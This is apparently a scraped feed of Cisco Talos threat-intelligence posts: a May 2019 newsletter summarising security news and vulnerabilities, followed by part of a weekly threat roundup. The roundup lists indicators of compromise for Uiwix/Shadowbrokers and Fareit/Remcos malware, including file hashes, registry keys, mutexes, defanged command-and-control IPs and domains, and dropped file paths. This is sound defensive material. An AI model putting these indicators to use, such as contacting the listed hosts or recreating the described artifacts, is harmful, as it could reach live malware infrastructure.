6e840301949f41830b927ef569e581d349820387a3ff45a90ef4ec8e4f6f0e86
6f840523ce151950e40e24bfedc27e6ba17a9f65b2a4c3105b543b44e153037d
7086dd6a001e339ae9f789301de2fda398964799094587d55a8860199cdcbcba
72a45d06936294c83c321d4fb312bdaa9b3afdc089975021f4b80d1046f62623
75822e46bf9e827346da33141b8b69bb6210a29f2996d246d565e9567f95e9fe
7758f78992fe71389e36b63d0b22f174d67b8139a80c96df5ebdcef7f1eaa954
7772c892e7a846a7c7d852b73237f2d5e3aea485d423ddccfd7b66262b2a0a7a
77833ef35c69cee4d6c43b13330ef71f08db13290d3d079040ab5d0298a57ccf
78b83e6f1612dd86338faadbccd2b05ecdbcdf221ab694daa6fe1ce0928e2d68
78e917a47f28905498694ec901ae7619c46c71d5f57879ad0a43a451d107b8a1
7e9e493e41fab952e0a5681782a54954447abc3df6ef1d1860e59e586ea6c990
81788d067834ea0298b88cc251ac4b56820bbb85c77345b35886c9af1b139e1c
82bf2bf053fc21efd2b09403bb489d1f32e30ff4523a50963f05394524264ac6
83a60ac3d70283ff82eeacdb500a204170c5ffcc6f59cbc30c0e7a5410ecb293
83c4d91f93f56abf7504faa83a01a84210eb55de991131240a55dd22cb3cb55a
87bf71ceaeacb6a70d86e6ff96ba4e1d2232c2b84242e8cef7ba30b5de47b4a4
89b01325e7a7a8e41d598d07efec7ade3b5da72a97d0a02054c8be8edf41ceb7
8a8e093089e7d144e5cbef20b5010a27da9c29ac0d64a924bb311a3a50ea5b05
8b88a48e14aec83e1c87fe6ca7a66ad718a82276766756f5741fb446bfc0db8f
8bbb44176e94f4e65cc6862e62f3b1544617edc889105e9af07886c0a62942ac
8fa303e89e0f25b4929d3a175c948e3b5a1b257a50911f3eeaaab7f3218077e3
9430fe8f223db4b551ed77e61ac6d38efee348940018ae9e1c15827f53cc618d
9548afeb0037077a1e98feabe952472b6882eccd4c8ef6e1d3a93370198fa6a5
99005c7ebde6c9d72e84fbf246c7b8aacc8e3c39132834b846a5ed4d49b1dcd5
9926bc84e414ad65947461955bf043fe1dd11358f5d517785f6d0571b9acf548
996ebea3b2e4b269cc10051f8a5d90cb0e68dee16a6000ff35bac85cb17024d4
9f2bf3c3efdd1e388f87a64bac0bfc4b756cc923b428e85ef9e67a86f79c0bc7
a0ea5b224ee2a85334cf434805edb9dd57b100975fd3c0a564b03d28a5203ee2
a4416996ae9e25b496a343f5a94366ea33ac8797eccd289a83402978b03d371f
aa11c00bc40f9bea2aff915d9cbf89e067aabdf764e52d664e7337545ffca04b
abdcb3156ed4bcc5bce29f621ee8593fec625f74b3d1580cd1aa6e7557f822cf
bd1190f7470b3219446024c9b85d1533d5ba56d24bcc618adfb05333c350ec8b
bddac88644d3e23abba825283df777b76676b5348fd7225aa3dc3ead39ff7201
bef299f5cff4b601adc6c8cde21d22465d19846f2f97d81fa8ea2439a4867864
c075b937f4ad0b6077253ad1ebc8cf531c6f1ba167f90cd6ed77fc7a44684340
c4f10d10da4598d970ada132f7a476f74902143567d45afd4858d4d9fa7210af
c6edaa1e6125faddacb34f5f567cbb78abb1c138f970d914b95fdd4499052aa0
c6ef40e940c92b8399792521eb677f5238e21ecf99834826990153efa41064ba
c77ed215f5ca3eb4b5ab6926b32392c4d58bcaaa9ad1d585632372e7f059360f
c97049d43b38577c01ef508c6ba5f6d15a3002728e5896b5d4982ee206a12a8b
cd00617dd8eac1a70bff92d029861487197eb486deb0c4c66542af50309bc535
cd9d8c6c3bc14559d5da15887c5c12be6ac6241b9c36d1fcc0063ad489d14bb5
cdac2ca810ed43d4bd9bf7ade4b0a8dbc26fbeed3f11eee1aa5cb8334b6d6105
d8b5067443c940864e972369e259a0826bb3774487c8605d6e5e870510d41504
da823b80766ffc75ed32751ea6ded68e132976d28416fb78bddccd489372f069
e30ddbd161e44cf7823b1850604d1cf87d4b9c9af8d0407bde05e7bb758a0559
e3f9e76406739c68be2cd6a228131a63662e16fcf757c6251f5e4d0905ab3cd0
e8f943454ab41dbd019434e0716d923fb87547cf73306b164ada93612d5f263f
e8fff8ac794b44fade6bdf14f08104012bafff894e44003b84808a5bfd2cebbb
e946b516013cb6cff31e21ee2ccabd1b8ce1e5ed5a4f9e36ffad07c4d880e417
edf907d35b16877a6ff344bdb62852f0f1c418bc4f83072b518204e398e61365
f9969aaab5276399d486a0619840e41e63340c1106f1e2652eb098052d8a2241
fa3bc57c23c5f60050d5b6673681d8bc170d5c9417cfc4c231d3794800400315
fe294978397abe1f23b88e47a94d516c977cd0c9cb368bcdc20f5f3899daf6bd

Javascript hashes

dd8c25c7483acb627935b3ec6de505aa7fdf95ee4db8108b89d0deb57510217c
581fe44b3da62d2155452beeda2f20f63fa042271a97cd8e016b4f6f6f8b575f
37f2b74550724859eb8b30fd60d8580c0e4eb6dc64d5d55e46774967fb0b9719
9a849f42734c1bad3fa3c3b5cb5d8781c21e6241f8977636774384e6177756f2
88b780e35400a63e5f2526e67287508865801f4c176b449c9bd9897a6f4d099e
b853bf59cbfa95d5c76c76b5cf583d867929ffd164e248e33f55929ce0f65456
84defbc371379f548cbfc7837128f33c35a2a95835d93e287c6c2f7f8428d910
fa209beccf0fe4883b900462ecdf25f7a405adc962f393e116a556f4018773a3
f7ea4652a096c007a233fb588d7a1b129a1b68829f78d58bb67b33c3582f032d
16ea880880c3466e3ff95bc3df309242861b0d43600862b0e9f563bda90d00d3
11447fbf6b64d137ab09ae7c861719169650a06ccc44abf0bcbbac8f5830343b
e57062a03e0397ba7b5edba76b92f6e00e00a3f5f3126335a152803ba9dea5a9
f3667a47b00bd70f06cefa19de31ccd818095638059f2fe237096741c6b47863
86e07fcea780307b1ef2151b19a41170262947193b7b5b8998203ee0bb648c14
d0fefd2af365336288bc8d7c9bb3d840e483cccf8c2afe493e3dc71e402a78c8
3876816f0cc13e72c2ed64e857090c6a78106b9accc5f8d8fd90652a293890be
170f58ca16e031ce31d117ba36a525189cfe4a08fece3fe1d65f18d293e2c7fe
e64d432aac6c9209d84b9e9b9b77bae4148dba91f49e2871c6a14a2d0777e8e0
8041bc11d40ef808f9a25a5b3d2104aa67e6ba5a696d1bd352ccdf8b3039df9b
1333715b86d4009eb40b92675ed494dda786c275ccdcd59644ea3b0408df3d08
59dbf5984c48109a16de20656a3305269f4afa66e8864276e69d900d6cfe92c0
5468b140b70a7c6566cc7bc60e11e32d0165015df59fc448588fa9f7c68a5c94
82a13c434e21f40bf5f1e7e2694784e2152834c3c5e7188026efd4d698d63d8d
2ce2651e7ea2ece2b45cadbf7ef916a998d14bbf3830631cf1de6c4c28a97d80
ce65b98b78ee749c5db5cb678cb6a8f21f568446a9e7433f6cb3c2d648602512
b76cc76001cb245697bab1d14b0b0a9c85dc0a034d70f70cc7b4a207124b932f
c9ce209cbc4d3a733ed2dc6ff65318ab0d49506a9b406e8c11805b762c80d2b0

Threat Source (May 2, 2019)

$
0
0

Newsletter compiled by Jonathan Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

If you haven’t yet, there’s still time to register for this year’s Talos Threat Research Summit— our second annual conference by defenders, for defenders. This year’s Summit will take place on June 9 in San Diego — the same day Cisco Live kicks off in the same city. We sold out last year, so hurry to register!

This week was stacked with original research. First up was the Sodinokibi ransomware, which we saw being distributed via a zero-day vulnerability in Oracle WebLogic. Today, we also released our findings on a new variant of Qakbot, which is more difficult to detect than older versions.

Finally, we also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Location: Industriens Hus, Copenhagen, Denmark
Date: May 29
Speaker: Paul Rascagnères
Synopsis: Paul will give an overview of an espionage campaign targeting the Middle East that we called “DNSpionage.” First, he will go over the malware and its targets and then talk about the process the attackers took to direct DNSs. The talk will include a timeline of all events in this attack, including an alert from the U.S. Department of Homeland Security.

Cyber Security Week in Review

  • Cisco disclosed a critical vulnerability in the Nexus 9000 Series Application Centric Infrastructure (ACI) Mode data-center switch that could allow an attacker to secretly access system-level resources. The company disclosed 39 other bugs, as well, on Thursday.
  • The latest version of Google Chrome fixed two vulnerabilities in the web browser. One is considered to be of “high” severity: An out-of-bounds vulnerability in SQLite.
  • Citrix says attackers were able to obtain persistence on their systems for about six months and may have stolen employees’ personal data. The software company says the breadth of the attack is not yet known but could involve stolen Social Security numbers, names and financial information.
  • Financial data from several large companies were leaked online after a technology company refused to pay a ransom. German IT provider Citycomp had data stolen in an attack, including information on Oracle, Porsche and Toshiba.
  • Magecart launched a renewed attack on OpenCart websites. The credit card-stealing malware is going after the e-commerce platform, which is one of the three most popular shopping interfaces for sites to use. 
  • Slack warned potential investors that it could be the target of a nation-state-backed cyber attack. The group messaging platform revealed the ongoing threats ahead of its expected IPO.
  • An exposed database holds sensitive information on more than 80 million American households — but no one seems to know who owns it.
  • Apple removed several parental control apps from its store. The company said the programs were utilizing illicit, “highly invasive” mobile device management techniques.
  • Norwegian aluminum maker Norsk Hydro estimates a recent ransomware attack cost the company the equivalent of $52 million in the first quarter. 

Notable recent security issues

Title: Oracle vulnerability opens users to remote code execution attacks
Description: Oracle released an out-of-band pouch for WebLogic servers that could allow an attacker to carry out remote code execution attacks. Security researchers discovered the bug being exploited earlier this month by attackers in the wild. Oracle assigned the bug CVE-2019-2725 and gave it a CVSS score of 9.8/10, highlighting how serious the issue is. WebLogix server owners are urged to update as soon as possible.
Snort SIDs: 49942, 49943

Title: JasperLoader targets Europe with Gootkit banking trojan
Description: A loader known as "JasperLoader" has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries, with a particular focus on Germany and Italy. JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult. It appears that this loader was designed with resiliency and flexibility in mind, as evidenced in later stages of the infection process.
Snort SIDs: 49914, 49915

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: xme64-2141.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: Tempmf582901854.exe
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: 799b30f47060ca05d80ece53866e01cc.vir
Claimed Product: N/A
Detection Name: W32.Generic:Gen.21ij.1201

SHA 256: d05a8eaf45675b2e0cd6224723ededa92c8bb9515ec801b8b11ad770e9e1e7ed
MD5: 6372f770cddb40efefc57136930f4eb7
Typical Filename: maftask.zip
Claimed Product: N/A
Detection Name: PUA.Osx.Adware.Gt32supportgeeks::tpd


Threat Roundup for April 26 to May 3

$
0
0

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 26 and May 03. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Shadowbrokers-6958490-0
    Malware
    Uiwix uses ETERNALBLUE and DOUBLEPULSAR to install ransomware on the infected system. Encrypted file names include "UIWIX" as part of the file extension. Unlike the well-known WannaCry ransomware, Uiwix doesn't "worm itself." It only installs itself on the system.
     
  • Win.Malware.Fareit-6958493-0
    Malware
    The Fareit trojan is primarily an information stealer that downloads and installs other malware.
     
  • Win.Malware.Ursnif-6957672-0
    Malware
    Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
     
  • Win.Ransomware.Cerber-6957317-0
    Ransomware
    Cerber is ransomware that encrypts documents, photos, databases and other important files using the file extension ".cerber."
     
  • Win.Dropper.Nymaim-6956636-0
    Dropper
    Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
     
  • Win.Dropper.Qakbot-6956539-0
    Dropper
    Qakbot, aka Qbot, has been around for since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.
     
  • Win.Malware.Tovkater-6956309-0
    Malware
    This malware is able to download and upload files, inject malicious code and install additional malware.
     
  • Doc.Downloader.Powload-6956274-0
    Downloader
    Powload is a malicious document that uses PowerShell to download malware. This campaign is currently distributing Emotet malware.
     
  • Win.Dropper.Kovter-6956146-0
    Dropper
    Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
     
  • Win.Trojan.Razy-6956092-0
    Trojan
    Razy is oftentimes a generic detection name for a Windows trojan. This cluster of samples contains encrypted code in the resources section that could be injected to a legitimate process.
     

Threats

Win.Malware.Shadowbrokers-6958490-0


Indicators of Compromise


Registry KeysOccurrences
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABC\INDEXES\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963} 19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB7
Value Name: _FileId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB7\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: 100000000928D
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB7
Value Name: AeFileID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB8
Value Name: _FileId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB8\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: 1000000009511
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB8
Value Name: AeFileID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB9
Value Name: _FileId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB9\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: 1000000009362
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB9
Value Name: AeFileID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA
Value Name: _ObjectId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA
Value Name: _FileId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA
Value Name: _Usn_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA
Value Name: _UsnJournalId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: 1000000009363
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA
Value Name: AeFileID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABA
Value Name: AeProgramID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB
Value Name: _ObjectId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB
Value Name: _FileId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB
Value Name: _Usn_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB
Value Name: _UsnJournalId_
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
Value Name: 10000000095D4
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB
Value Name: AeFileID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABB
Value Name: AeProgramID
19
<A>\{32DE27EC-AB30-11E8-A007-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\ABC
Value Name: _ObjectId_
19
MutexesOccurrences
Global\2f6e8021-6b52-11e9-a007-00501e3ae7b51
Global\2f7cc861-6b52-11e9-a007-00501e3ae7b51
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
69[.]55[.]1[.]14618
69[.]55[.]1[.]10018
69[.]55[.]4[.]19618
69[.]55[.]2[.]20118
69[.]55[.]4[.]15518
69[.]55[.]2[.]13118
69[.]55[.]4[.]17918
69[.]55[.]4[.]17818
69[.]55[.]2[.]13018
69[.]55[.]4[.]21718
69[.]55[.]1[.]3618
69[.]55[.]1[.]3718
69[.]55[.]4[.]17118
69[.]55[.]4[.]17018
69[.]55[.]4[.]17318
69[.]55[.]4[.]17218
69[.]55[.]1[.]3018
69[.]55[.]4[.]17418
69[.]55[.]4[.]17718
69[.]55[.]4[.]17618
69[.]55[.]5[.]7518
69[.]55[.]5[.]7418
69[.]55[.]5[.]7918
69[.]55[.]5[.]7818
69[.]55[.]5[.]8118
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
v4[.]ipv6-test[.]com11
sex[.]kuai-go[.]com4
ilo[.]brenz[.]pl1
teetah[.]com1
thmqyo[.]com1
iadaef[.]com1
yvyqyr[.]com1
yyhhwt[.]com1
yoiupy[.]com1
abvyoh[.]com1
evoyci[.]com1
nzooyn[.]com1
niulzo[.]com1
meadgz[.]com1
yxpwly[.]com1
cberyk[.]com1
xuvvie[.]com1
nfgesv[.]com1
rjodmz[.]com1
ygjuju[.]com1
iauany[.]com1
zopkpn[.]com1
ubnuov[.]com1
kroqzu[.]com1
uxmaie[.]com1
See JSON for more IOCs
Files and or directories createdOccurrences
%SystemRoot%\Fonts\Mysql21
%SystemRoot%\Fonts\Mysql\bat.bat21
%SystemRoot%\Fonts\Mysql\Doublepulsar.dll20
%SystemRoot%\Fonts\Mysql\Doublepulsar2.dll20
%SystemRoot%\Fonts\Mysql\Eter.exe20
%SystemRoot%\Fonts\Mysql\Eter.xml20
%SystemRoot%\Fonts\Mysql\Eternalblue.dll20
%SystemRoot%\Fonts\Mysql\Eternalblue2.dll20
%SystemRoot%\Fonts\Mysql\NansHou.dll20
%SystemRoot%\Fonts\Mysql\cmd.bat20
%SystemRoot%\Fonts\Mysql\cnli-1.dll20
%SystemRoot%\Fonts\Mysql\coli-0.dll20
%SystemRoot%\Fonts\Mysql\crli-0.dll20
%SystemRoot%\Fonts\Mysql\dmgd-4.dll20
%SystemRoot%\Fonts\Mysql\exma-1.dll20
%SystemRoot%\Fonts\Mysql\file.txt20
%SystemRoot%\Fonts\Mysql\libeay32.dll20
%SystemRoot%\Fonts\Mysql\libxml2.dll20
%SystemRoot%\Fonts\Mysql\loab.bat20
%SystemRoot%\Fonts\Mysql\load.bat20
%SystemRoot%\Fonts\Mysql\mance.exe20
%SystemRoot%\Fonts\Mysql\mance.xml20
%SystemRoot%\Fonts\Mysql\nei.bat20
%SystemRoot%\Fonts\Mysql\p.txt20
%SystemRoot%\Fonts\Mysql\poab.bat20
See JSON for more IOCs
File Hashes
  • 00e8030802e8f6b32c9e9b5167ba6854797af91947d605889b5dba3b2a29b74e
  • 054441dbcac05960e2ba1ae81903f4ed48786be51aeb346f4c2cc1162ba1749f
  • 0fa0b6d80e850f42f7d17681b2ff2147694053aa4680ddfcf632ee89d183a6fc
  • 16488c72a0c92c8a72dc78ee9d52cfc4ebf8a6392d9f91f2c966fc99abe05a03
  • 181ce9db0dea2a3a2e08860620c3015e61995a93729cb07e0b157d0e75c73343
  • 229ab5a9502a4f9efaf6b1ae193d49cd529479e4adf0475caa80f0086dd20c31
  • 23e3a6d9ce11a9ceef4f1a0731368a85587d612063d67fb518156fa88e20a277
  • 5a831048eaeed5fa07ae830ebe1ac176cdffd0764a978c89228f45125a8c07c3
  • 749cdaf3de5490da6a5c1900b415e1a10cba45d19593ca98378781d9488b6bee
  • 77f5a8b8c3d9091b5d3f050b2ac6183a9bfb86e8fd1085e96926c513c69cbffb
  • 811fc3535e7e4e67164d12a3a8a5d839365873b53e20f1ac3b5638cba279d0e9
  • 96799361f9e214dcdb35d14f3b93e35736d4f5e11a25e4672989c9b436ee6cdc
  • a013f2631ac35d43652d5ab7fd30e71187398b5c6ede6081fa6c73fb3f0b469a
  • ac80e17388fbd1f59b80c411d1449ce90a4ce5ada9d6ced63dc9890bfe5249ea
  • c29ae0b2992a0320c5d584a7af6ff8dfc590140d0652aa22b374a8b6946a76f3
  • c74a2a95439224bdef39354f37ccb4ded7ce7ba071aac9d5efe505cdb7a828ac
  • db1b669b7daffcb3b6be5ba635afe5890d85e3f734a74e9a97c864ebb23ffd30
  • dc814196d52db10a9231754a3c33b58af9c995490a16c20328a954d8c1918589
  • e3e7c5bcb49da52952d85f30efbc86830536593e96e6b29f05f22ac14e208ce5
  • e6d879189c9cfe58aa9f83856eb4849caee841eb71557522c14d38bdd8bc8efe
  • fcad77aba9a0290e0f25b0512ceadf102aff36c955a319275b3f44565d53c383

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Fareit-6958493-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: internat.exe
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: AGP Manager
3
<HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASAPI32 2
<HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASMANCS 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: EnableFileTracing
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: EnableConsoleTracing
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: FileTracingMask
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: ConsoleTracingMask
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: MaxFileSize
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: FileDirectory
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: EnableFileTracing
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: EnableConsoleTracing
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: FileTracingMask
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: ConsoleTracingMask
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: MaxFileSize
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: FileDirectory
2
<HKCU>\Software\Microsoft\Windows Script Host\Settings 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
Value Name: AGP Manager.job
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
Value Name: AGP Manager.job.fp
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER
Value Name: Index
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
Value Name: AGP Manager Task.job
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
Value Name: AGP Manager Task.job.fp
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER TASK
Value Name: Index
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER
Value Name: Id
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER TASK
Value Name: Id
2
MutexesOccurrences
A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A2
Remcos_Mutex_Inj1
rdyboost_Perf_Library_Lock_PID_2101
usbhub_Perf_Library_Lock_PID_2101
.NET CLR Data_Perf_Library_Lock_PID_5b81
.NET CLR Networking 4.0.0.0_Perf_Library_Lock_PID_5b81
.NET CLR Networking_Perf_Library_Lock_PID_5b81
.NET Data Provider for Oracle_Perf_Library_Lock_PID_5b81
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_5b81
.NET Memory Cache 4.0_Perf_Library_Lock_PID_5b81
.NETFramework_Perf_Library_Lock_PID_5b81
ASP.NET_1.1.4322_Perf_Library_Lock_PID_5b81
ASP.NET_4.0.30319_Perf_Library_Lock_PID_5b81
ASP.NET_Perf_Library_Lock_PID_5b81
BITS_Perf_Library_Lock_PID_5b81
ESENT_Perf_Library_Lock_PID_5b81
Lsa_Perf_Library_Lock_PID_5b81
MSDTC Bridge 3.0.0.0_Perf_Library_Lock_PID_5b81
MSDTC Bridge 4.0.0.0_Perf_Library_Lock_PID_5b81
MSDTC_Perf_Library_Lock_PID_5b81
Outlook_Perf_Library_Lock_PID_5b81
PerfDisk_Perf_Library_Lock_PID_5b81
PerfNet_Perf_Library_Lock_PID_5b81
PerfOS_Perf_Library_Lock_PID_5b81
PerfProc_Perf_Library_Lock_PID_5b81
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
47[.]254[.]132[.]2172
5[.]8[.]88[.]2132
91[.]192[.]100[.]41
185[.]165[.]153[.]191
91[.]193[.]75[.]331
194[.]5[.]99[.]41
103[.]200[.]5[.]1861
185[.]165[.]153[.]1351
105[.]112[.]98[.]981
129[.]205[.]112[.]1321
212[.]7[.]192[.]2411
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
snooper112[.]ddns[.]net1
harryng[.]ddns[.]net1
popen[.]ru1
hfgdhgjkgf[.]ru1
rtyrtygjgf[.]ru1
icabodgroup[.]hopto[.]org1
Files and or directories createdOccurrences
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C53
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat3
%ProgramFiles(x86)%\AGP Manager3
%ProgramFiles(x86)%\AGP Manager\agpmgr.exe3
%System32%\Tasks\AGP Manager2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat2
%APPDATA%\Install2
%APPDATA%\Install\Host.exe2
%System32%\Tasks\AGP Manager Task2
%ProgramData%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol1
%LOCALAPPDATA%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol1
%APPDATA%\remcos1
%APPDATA%\remcos\logs.dat1
%APPDATA%\remcos\remcos.exe1
